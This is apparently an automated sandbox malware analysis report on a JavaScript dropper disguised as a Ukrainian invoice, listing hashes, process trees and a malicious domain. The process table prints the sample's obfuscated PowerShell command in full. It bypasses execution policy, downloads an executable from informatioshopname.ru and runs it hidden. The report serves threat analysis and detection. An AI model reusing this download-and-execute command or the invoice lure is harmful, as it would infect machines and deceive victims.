File name: | рахунок фактура до оплати за 09.08.2019р.js |
Full analysis: | https://app.any.run/tasks/a4b8589a-60e9-4f9e-9939-283404e7db4c |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 07:49:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | 3342FC3C4FAC9748BF055912916C0333 |
SHA1: | 292D79850630606EE511C0F8008CAC246EBCD498 |
SHA256: | 4ED984D2EAEB3A9B00BEEE7A4FFB22FDFAD4DCFC2189E7AA9F049C35AEBCA7F3 |
SSDEEP: | 192:pmIGtCHYJHk3u/8USUy8po0aG7GZZi9Nxick1ti38LLEF0AMIi0Na:pmIGRJ6uuH8faG7GZZiXxiLtzhA7iia |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2748 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\рахунок фактура до оплати за 09.08.2019р.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3992 | "C:\Windows\System32\cmd.exe" /c tijWZkgTyNPLHsI & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://informatioshopname.ru/partiya/malashop.exe','%temp%LWb91.exe'); & %temp%LWb91.exe & PUeNHoRWLOXEkSz | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2684 | PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://informatioshopname.ru/partiya/malashop.exe','C:\Users\admin\AppData\Local\TempLWb91.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2684 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LC736P6T1BETHB46CZUU.temp | — | |
MD5:— | SHA256:— | |||
2684 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2684 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF168bba.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
Domain | IP | Reputation |
---|---|---|
informatioshopname.ru |
| malicious |